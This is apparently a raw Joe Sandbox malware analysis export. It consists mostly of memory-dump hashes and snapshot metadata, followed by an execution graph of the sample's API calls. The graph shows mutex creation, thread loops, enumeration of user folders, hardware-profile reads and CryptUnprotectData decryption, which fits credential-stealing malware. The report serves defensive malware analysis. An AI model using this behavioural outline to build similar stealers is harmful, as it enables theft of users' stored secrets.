                                                  • Opcode Fuzzy Hash: 23ab1def69b44f80a17804b14f5bc35d125979725f4c017f8b897144c2f4fd2b
                                                  • Instruction Fuzzy Hash: BED0C9363451249F87049F59E444CA97BA9EB9D6617014066FD09C7331CA71DC51CBD5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b910fbbb8dcec745eaf020583208ffd23deb53637c2743d4001c1dc7317a96d1
                                                  • Instruction ID: 1674d0a4d56e946c515cf441ec8d702adf2156f4ced1076f485681382141716e
                                                  • Opcode Fuzzy Hash: b910fbbb8dcec745eaf020583208ffd23deb53637c2743d4001c1dc7317a96d1
                                                  • Instruction Fuzzy Hash: BAC012322000187B4A01AB85D800C86FBADAF8B654314C056E60C8B121D663E56297D4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6661fd6ed00994356091716c8069bed09fd6991fb2767e42b69fdcada16d76fd
                                                  • Instruction ID: d0047cdaa58a30a48b7ba8424b54297fba69bc927f301f87aab23a822f840fd0
                                                  • Opcode Fuzzy Hash: 6661fd6ed00994356091716c8069bed09fd6991fb2767e42b69fdcada16d76fd
                                                  • Instruction Fuzzy Hash: F6D0C9BA2996428FC745AB34D849AA43BA29F56204B0A81F6F00DCBA73D76698418B11
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 391a97289fa49b20927774722e8bb267ad5efdfedc0ea772c793c97581a19cdc
                                                  • Instruction ID: 3db581596f6fe7e33e0912ece65a7865dfbfb7d5ce0f65ca12720d5a0a7212c3
                                                  • Opcode Fuzzy Hash: 391a97289fa49b20927774722e8bb267ad5efdfedc0ea772c793c97581a19cdc
                                                  • Instruction Fuzzy Hash: 01C012342052048AC709A728CCA0229B656EF95304B98D8A882098E265DB37CE4BCB44
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8dd40e4e2701e06149c1da0ab1992ce3391ac9d062363e2b81b7fdfc42390bff
                                                  • Instruction ID: f614ed0013b97a4c8977333f9e2eb3ac158831a0d84da00f4f0381fa69b30298
                                                  • Opcode Fuzzy Hash: 8dd40e4e2701e06149c1da0ab1992ce3391ac9d062363e2b81b7fdfc42390bff
                                                  • Instruction Fuzzy Hash: 78B0922231463823080E329A78204AEB68E4AA68A8685006AEA099B280CD861E0103DE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4db7279cacf9fa6d4ba65eecd41e96e763771723128e76367699b363ac1d83ec
                                                  • Instruction ID: a578a93ffb38dc95f6c28707b9696e9e0e86d1ddeda847a0fd586a55bb32b6f8
                                                  • Opcode Fuzzy Hash: 4db7279cacf9fa6d4ba65eecd41e96e763771723128e76367699b363ac1d83ec
                                                  • Instruction Fuzzy Hash: AEB09B35755574150F1E72AD34104FD5B4509E6564655015EE50A9B641CD850E0107CA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: db61a42a1234d6f688ea2800cb8fe6d961c092d5754d3e076a14006be2dcc141
                                                  • Instruction ID: 3f2433c52889d27ae94117e5f37374f7d24db6b3d31c3995a4d669854eab9cda
                                                  • Opcode Fuzzy Hash: db61a42a1234d6f688ea2800cb8fe6d961c092d5754d3e076a14006be2dcc141
                                                  • Instruction Fuzzy Hash: 52C08C63830A004CC310F63080160ADBB72FE62200B80AA79C48239920FA24956A8391
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 08aff93ebc00f3bc898e18d76c62943a4b2705b9653cb778ba6c296d767c2c44
                                                  • Instruction ID: 57365cffb70f71b469559bdd69d75c2fe3fae5ffb58d0a86513c464eb3069872
                                                  • Opcode Fuzzy Hash: 08aff93ebc00f3bc898e18d76c62943a4b2705b9653cb778ba6c296d767c2c44
                                                  • Instruction Fuzzy Hash: FAC08C32000208BBCB027E81CC00E5ABF2ABB44390F10C004F7080D061D3B3D523EBC0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cc52ac3639a97314ee297d08111bbe1ece30a28e1fa1582acf904ac83a81c78e
                                                  • Instruction ID: bc08c7ed2517b2eb5f60bb13c16204f855fce7a81c6ed118fe4d2913983a731c
                                                  • Opcode Fuzzy Hash: cc52ac3639a97314ee297d08111bbe1ece30a28e1fa1582acf904ac83a81c78e
                                                  • Instruction Fuzzy Hash: 7BD012301043464BCB2A57368C11345BF317F42104B5845FDC1894EA93C77FC4C6CB85
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fdb7c5fceb54c1cd3ae833542ce158b792e1862dde1c43a81aba0a5468ca7a9f
                                                  • Instruction ID: 17a2e3eaac22e293f5e93466c658325a328e100e8872a203a847bf3d3a52f722
                                                  • Opcode Fuzzy Hash: fdb7c5fceb54c1cd3ae833542ce158b792e1862dde1c43a81aba0a5468ca7a9f
                                                  • Instruction Fuzzy Hash: F9B092B26020186D6198A1FD6521BE967049BC416133198BBC10DDA352C5610596C295
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 91da765e8c9d6b4de3cb2826a2841883dbebfffb8149f70a4dccb7bd4583f9c5
                                                  • Instruction ID: d75a58238c7f511b5f3e12cc4fddbdbdfe13a6275e0ad9962c51d559d6ce289f
                                                  • Opcode Fuzzy Hash: 91da765e8c9d6b4de3cb2826a2841883dbebfffb8149f70a4dccb7bd4583f9c5
                                                  • Instruction Fuzzy Hash: C2C09B37109204AE8641E754C9A4D2FFAE5FFB7300B40EC92A34547031DA33C95DE712
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: eeaef9b10b7c6825025ac295034d11ac1781c793f56ddca9640d466430bb11f3
                                                  • Instruction ID: d77331d01c494b34a0a1ba301ee13a1f87b48ddd987b2ac5f525b7548dd93187
                                                  • Opcode Fuzzy Hash: eeaef9b10b7c6825025ac295034d11ac1781c793f56ddca9640d466430bb11f3
                                                  • Instruction Fuzzy Hash: F2C092351845098FC310AB68D84CFA077EAEF45605F0980F0E10C8BB33DA22F8408B44
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: eeaef9b10b7c6825025ac295034d11ac1781c793f56ddca9640d466430bb11f3
                                                  • Instruction ID: d77331d01c494b34a0a1ba301ee13a1f87b48ddd987b2ac5f525b7548dd93187
                                                  • Opcode Fuzzy Hash: eeaef9b10b7c6825025ac295034d11ac1781c793f56ddca9640d466430bb11f3
                                                  • Instruction Fuzzy Hash: F2C092351845098FC310AB68D84CFA077EAEF45605F0980F0E10C8BB33DA22F8408B44
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e181fecefc109fefdcbd0b026ec8ceb3c3019faaa6a304f8c7faab048bc27f8e
                                                  • Instruction ID: 49bfd88f15d2ad378ac4c52fa4bd87f697f18fbf5c58269ab125fb97bd15b3a1
                                                  • Opcode Fuzzy Hash: e181fecefc109fefdcbd0b026ec8ceb3c3019faaa6a304f8c7faab048bc27f8e
                                                  • Instruction Fuzzy Hash:
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4512242853.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7d20000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Hp$Hp$Hp$Hp$Hp
                                                  • API String ID: 0-739616219
                                                  • Opcode ID: 5faab71b03056a690fa7e18385fb9884037f87424c74e70a1142f96eb14186da
                                                  • Instruction ID: a1e85baa2730bdb978b701b1cd1374778345656b6faffda53887babc29a868e4
                                                  • Opcode Fuzzy Hash: 5faab71b03056a690fa7e18385fb9884037f87424c74e70a1142f96eb14186da
                                                  • Instruction Fuzzy Hash: 9152D370A00264CFDB14DFA8D850BAEBBF2EF85304F1480AAD44AAB354DA34DD56DF91
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513616921.00000000099B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99b0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a5cbe2ab3845b8caef6bccc6dd7cde2b4515b203c7bfc8f3ec3be0e21274e1dc
                                                  • Instruction ID: 13fbce00c58d5d9a540cbe779532c706836ff4fd88b71522ec324ac0fb5e6635
                                                  • Opcode Fuzzy Hash: a5cbe2ab3845b8caef6bccc6dd7cde2b4515b203c7bfc8f3ec3be0e21274e1dc
                                                  • Instruction Fuzzy Hash: 2212C5B1C81745EAE310CF25E84C2A93BB9F749328F506309C2616F6E5DBBC196ACF44
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513616921.00000000099B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99b0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5515aede485a16a7cd8e383bd5faa4e843b2c561cf180d282f88f16b7ba0de61
                                                  • Instruction ID: 8bf2fcac096460a7c760357fd9af86ad3f4ef84a32daf16ee148d686fa1abccf
                                                  • Opcode Fuzzy Hash: 5515aede485a16a7cd8e383bd5faa4e843b2c561cf180d282f88f16b7ba0de61
                                                  • Instruction Fuzzy Hash: 40A16D36E002098FCF09DFA5C9845DEB7B6FF89300B15856AE905AF265DB39E915CB80
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513616921.00000000099B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99b0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: eaf116fdf100ac211e2b9efaab7a43cebc42c66c384f9eca55da4e72e1e3145d
                                                  • Instruction ID: 7e8abfed257547d90d1af294c1e6a8a0b0ea80fa2969d74ae2a8c01a08bcab06
                                                  • Opcode Fuzzy Hash: eaf116fdf100ac211e2b9efaab7a43cebc42c66c384f9eca55da4e72e1e3145d
                                                  • Instruction Fuzzy Hash: 89C129B1C81745EAD710CF24E8482A97BB9FB89324F506309D2616B2D5DBBC196ACF44
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4512242853.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7d20000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7f113b892ab13074f00a4e6125f29df56bd07eea1eb8aec1fcf1d8bf169c2fdb
                                                  • Instruction ID: 0135d978ab35294855721e8781546228f377d07d5351f880bbed2179f606283b
                                                  • Opcode Fuzzy Hash: 7f113b892ab13074f00a4e6125f29df56bd07eea1eb8aec1fcf1d8bf169c2fdb
                                                  • Instruction Fuzzy Hash: 61316C727043618FCB169729A850B6EBFA6CFD6214F1840AAC506DF361DE28DC13A775
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.2558018946.0000000000871000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00870000, based on PE: true
                                                  • Associated: 00000003.00000002.2557789938.0000000000870000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000003.00000002.2558676380.0000000000AD9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000003.00000002.2559507583.0000000000D50000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000003.00000002.2559524942.0000000000D53000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000003.00000002.2559539993.0000000000D54000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000003.00000002.2559553598.0000000000D55000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000003.00000002.2559603334.0000000000D7C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000003.00000002.2559621143.0000000000D88000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000003.00000002.2559635860.0000000000D89000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000003.00000002.2559648594.0000000000D8A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000003.00000002.2559661315.0000000000D8C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000003.00000002.2559661315.0000000000DA7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000003.00000002.2559661315.0000000000DAD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000003.00000002.2559661315.0000000000E15000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000003.00000002.2559791238.0000000000E1C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000003.00000002.2559791238.0000000000E2B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000003.00000002.2559791238.0000000000EB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000003.00000002.2560272632.0000000001052000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000003.00000002.2560285872.0000000001053000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000003.00000002.2560285872.000000000105F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_870000_tfi0ts5v.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b65c2346c372a812bf9a5a497f7710ebe99c163a2b211cbfcde99684ffbfdf79
                                                  • Instruction ID: 88c85808cf5de2e71f9863ff8217c56537940b105d456b93894c24938aef2aca
                                                  • Opcode Fuzzy Hash: b65c2346c372a812bf9a5a497f7710ebe99c163a2b211cbfcde99684ffbfdf79
                                                  • Instruction Fuzzy Hash: AB319C2391CFC482D3218B24F5413AAB364F7A9794F15A715EFC852A1ADF38E2E5CB40
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.2558018946.0000000000871000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00870000, based on PE: true
                                                  • Associated: 00000003.00000002.2557789938.0000000000870000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000003.00000002.2558676380.0000000000AD9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000003.00000002.2559507583.0000000000D50000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000003.00000002.2559524942.0000000000D53000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000003.00000002.2559539993.0000000000D54000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000003.00000002.2559553598.0000000000D55000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000003.00000002.2559603334.0000000000D7C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000003.00000002.2559621143.0000000000D88000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000003.00000002.2559635860.0000000000D89000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000003.00000002.2559648594.0000000000D8A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000003.00000002.2559661315.0000000000D8C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000003.00000002.2559661315.0000000000DA7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000003.00000002.2559661315.0000000000DAD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000003.00000002.2559661315.0000000000E15000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000003.00000002.2559791238.0000000000E1C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000003.00000002.2559791238.0000000000E2B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000003.00000002.2559791238.0000000000EB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000003.00000002.2560272632.0000000001052000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000003.00000002.2560285872.0000000001053000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000003.00000002.2560285872.000000000105F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_870000_tfi0ts5v.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 19322aacc7dd447383d6f2170a10e82d5a65409c32a3e247da5a00b3a98942e9
                                                  • Instruction ID: 65257609e367431698527e93baccad4cd2e53089f2180e73f16af47ad75ca2c0
                                                  • Opcode Fuzzy Hash: 19322aacc7dd447383d6f2170a10e82d5a65409c32a3e247da5a00b3a98942e9
                                                  • Instruction Fuzzy Hash:

                                                  Execution Graph

                                                  Execution Coverage:11.6%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:12.9%
                                                  Total number of Nodes:381
                                                  Total number of Limit Nodes:17
                                                  execution_graph 2841 2325e3 2843 2325eb 2841->2843 2842 23260d 2843->2842 2844 2326ba 2843->2844 2845 232629 2843->2845 2847 23275d 2844->2847 2848 2326cc 2844->2848 2864 231ea0 RtlAllocateHeap 2845->2864 2863 232692 2847->2863 2866 231ea0 RtlAllocateHeap 2847->2866 2865 231ea0 RtlAllocateHeap 2848->2865 2851 232648 2854 231060 8 API calls 2851->2854 2852 2326eb 2855 2312f0 9 API calls 2852->2855 2853 23278e 2857 231000 7 API calls 2853->2857 2856 232686 2854->2856 2858 232729 2855->2858 2859 231ee0 RtlFreeHeap 2856->2859 2860 2327cc 2857->2860 2861 231ee0 RtlFreeHeap 2858->2861 2859->2863 2862 231ee0 RtlFreeHeap 2860->2862 2861->2863 2862->2863 2864->2851 2865->2852 2866->2853 2494 231d30 CreateMutexA 2495 231d52 GetLastError 2494->2495 2496 231d5f 2494->2496 2495->2496 2497 231d64 2495->2497 2507 231ca0 2497->2507 2499 231d86 2518 2330c0 2499->2518 2501 231e27 2536 231c80 2501->2536 2503 231e17 Sleep 2505 231da0 2503->2505 2504 231e33 CloseHandle ExitProcess 2505->2501 2505->2503 2529 233c50 2505->2529 2543 2316e0 2507->2543 2510 231cce ExitProcess 2514 231cba 2514->2510 2564 232810 2514->2564 2517 231cd6 2517->2499 2762 231470 2518->2762 2520 2330ce 2781 231ea0 RtlAllocateHeap 2520->2781 2522 2330db 2523 238b90 GetCurrentHwProfileA 2522->2523 2528 2331a1 2522->2528 2524 233112 2523->2524 2782 2331b0 2524->2782 2526 233147 2527 232b10 3 API calls 2526->2527 2527->2528 2528->2505 2817 231ea0 RtlAllocateHeap 2529->2817 2531 233d1a 2531->2505 2532 233c63 2532->2531 2533 238b90 GetCurrentHwProfileA 2532->2533 2534 233c9a 2533->2534 2535 232b10 3 API calls 2534->2535 2535->2531 2818 2329e0 2536->2818 2538 231c8c 2824 233ee0 2538->2824 2542 231c99 2542->2504 2569 231c40 2543->2569 2547 2316f0 2549 2316f4 2547->2549 2576 2317e0 2547->2576 2549->2510 2552 231e50 HeapCreate 2549->2552 2550 23170b 2550->2549 2551 2317e0 3 API calls 2550->2551 2551->2550 2553 231cb1 2552->2553 2553->2510 2554 233d50 2553->2554 2584 233ef0 VirtualAlloc 2554->2584 2557 233d68 2588 2343e0 2557->2588 2558 233d74 2595 231ea0 RtlAllocateHeap 2558->2595 2560 233d6d 2560->2514 2562 233d82 2596 231ee0 2562->2596 2565 232848 2564->2565 2566 2328c5 CreateThread 2565->2566 2568 231cc7 2565->2568 2567 2328eb CreateThread 2566->2567 2566->2568 2605 232db0 2566->2605 2567->2568 2599 232e60 2567->2599 2568->2510 2568->2517 2570 2316eb 2569->2570 2571 231c47 CryptUpdateProtectedState WinHttpTimeFromSystemTime 2569->2571 2573 231a40 2570->2573 2571->2570 2583 231a20 GetPEB 2573->2583 2575 231a55 2575->2547 2578 231845 2576->2578 2577 2318e8 2577->2550 2579 2318a2 GlobalHandle 2578->2579 2582 23188c 2578->2582 2579->2578 2580 2319f7 LoadLibraryA GetProcAddress 2580->2577 2581 2319f1 2581->2580 2582->2577 2582->2580 2582->2581 2583->2575 2585 233f16 VirtualAlloc 2584->2585 2586 233d5b 2584->2586 2585->2586 2587 233f39 VirtualAlloc 2585->2587 2586->2557 2586->2558 2587->2586 2589 2343ff 2588->2589 2590 2343ec VirtualFree 2588->2590 2591 234408 VirtualFree 2589->2591 2592 23441c 2589->2592 2590->2589 2591->2592 2593 234425 VirtualFree 2592->2593 2594 234439 2592->2594 2593->2594 2594->2560 2595->2562 2597 231ef1 RtlFreeHeap 2596->2597 2598 231f07 2596->2598 2597->2598 2598->2560 2604 232e6d 2599->2604 2600 2330af 2601 23309f Sleep 2601->2604 2604->2600 2604->2601 2611 231ea0 RtlAllocateHeap 2604->2611 2612 232920 2604->2612 2608 232db4 2605->2608 2606 232e4c 2607 232e3c Sleep 2607->2608 2608->2606 2608->2607 2610 232920 RtlFreeHeap 2608->2610 2620 232590 2608->2620 2610->2608 2611->2604 2613 232935 2612->2613 2619 2329ca 2612->2619 2614 231ee0 RtlFreeHeap 2613->2614 2615 232949 2614->2615 2616 231ee0 RtlFreeHeap 2615->2616 2617 232960 2616->2617 2618 231ee0 RtlFreeHeap 2617->2618 2618->2619 2619->2604 2622 23259c 2620->2622 2621 2325a2 2621->2608 2622->2621 2623 2326ba 2622->2623 2624 232629 2622->2624 2626 23275d 2623->2626 2627 2326cc 2623->2627 2643 231ea0 RtlAllocateHeap 2624->2643 2629 232692 2626->2629 2661 231ea0 RtlAllocateHeap 2626->2661 2653 231ea0 RtlAllocateHeap 2627->2653 2629->2629 2631 232648 2644 231060 2631->2644 2632 2326eb 2654 2312f0 2632->2654 2633 23278e 2662 231000 CryptUnprotectData 2633->2662 2639 231ee0 RtlFreeHeap 2639->2629 2641 231ee0 RtlFreeHeap 2641->2629 2642 231ee0 RtlFreeHeap 2642->2629 2643->2631 2645 231085 SHGetFolderPathW 2644->2645 2646 2310a4 2644->2646 2645->2646 2666 238d40 2646->2666 2648 2310c8 2649 2310f3 2648->2649 2679 231ec0 RtlSizeHeap 2648->2679 2649->2639 2651 2310da 2680 232b10 2651->2680 2653->2632 2655 231327 2654->2655 2656 231307 SHGetFolderPathW 2654->2656 2657 238d40 5 API calls 2655->2657 2656->2655 2658 23134c 2657->2658 2659 231366 2658->2659 2704 233a20 2658->2704 2659->2641 2661->2633 2663 23104e 2662->2663 2664 23103d 2662->2664 2663->2642 2750 2332a0 2664->2750 2690 231ea0 RtlAllocateHeap 2666->2690 2668 238d53 2669 238ed2 2668->2669 2691 232360 2668->2691 2669->2648 2672 238ec9 2673 231ee0 RtlFreeHeap 2672->2673 2673->2669 2674 238ea6 FindNextFileW 2676 238ebf FindClose 2674->2676 2677 238d95 2674->2677 2675 232360 2 API calls 2675->2677 2676->2672 2677->2672 2677->2674 2677->2675 2678 238d40 2 API calls 2677->2678 2678->2677 2679->2651 2697 232a60 2680->2697 2684 232b2d 2685 232bb0 2684->2685 2686 232b4f 2684->2686 2687 232920 RtlFreeHeap 2685->2687 2688 231ee0 RtlFreeHeap 2686->2688 2689 232b99 2687->2689 2688->2689 2689->2649 2690->2668 2694 232372 2691->2694 2692 232570 FindFirstFileW 2692->2677 2694->2692 2695 231ee0 RtlFreeHeap 2694->2695 2696 231ea0 RtlAllocateHeap 2694->2696 2695->2694 2696->2694 2701 232a6f 2697->2701 2698 232b01 2702 231ea0 RtlAllocateHeap 2698->2702 2699 232af4 Sleep 2699->2701 2701->2698 2701->2699 2703 231ea0 RtlAllocateHeap 2701->2703 2702->2684 2703->2701 2705 233a3c 2704->2705 2716 238b90 GetCurrentHwProfileA 2705->2716 2707 233a50 2718 233b80 2707->2718 2711 231ee0 RtlFreeHeap 2712 233b6c 2711->2712 2712->2659 2713 233ada 2714 232b10 3 API calls 2713->2714 2715 233b60 2713->2715 2714->2715 2715->2711 2717 238baa 2716->2717 2717->2707 2733 231ec0 RtlSizeHeap 2718->2733 2720 233b8f 2734 231ea0 RtlAllocateHeap 2720->2734 2722 233ba7 2735 237d10 2722->2735 2724 233be2 2725 233c1c 2724->2725 2726 233bf0 2724->2726 2727 231ee0 RtlFreeHeap 2725->2727 2730 231ee0 RtlFreeHeap 2726->2730 2731 233ac8 2727->2731 2728 233bb4 2728->2724 2739 2380d0 2728->2739 2730->2731 2732 231ea0 RtlAllocateHeap 2731->2732 2732->2713 2733->2720 2734->2722 2736 237d29 2735->2736 2737 237d23 2735->2737 2736->2728 2737->2736 2742 2389f0 2737->2742 2746 238a50 2739->2746 2745 231ea0 RtlAllocateHeap 2742->2745 2744 238a06 2744->2736 2745->2744 2747 2380dc 2746->2747 2748 238a59 2746->2748 2747->2724 2749 231ee0 RtlFreeHeap 2748->2749 2749->2747 2761 231ea0 RtlAllocateHeap 2750->2761 2752 2333b3 LocalFree 2755 2333dd 2752->2755 2753 2333c2 2753->2755 2756 2333cd LocalAlloc 2753->2756 2754 2332b3 2757 238b90 GetCurrentHwProfileA 2754->2757 2760 2333a7 2754->2760 2755->2663 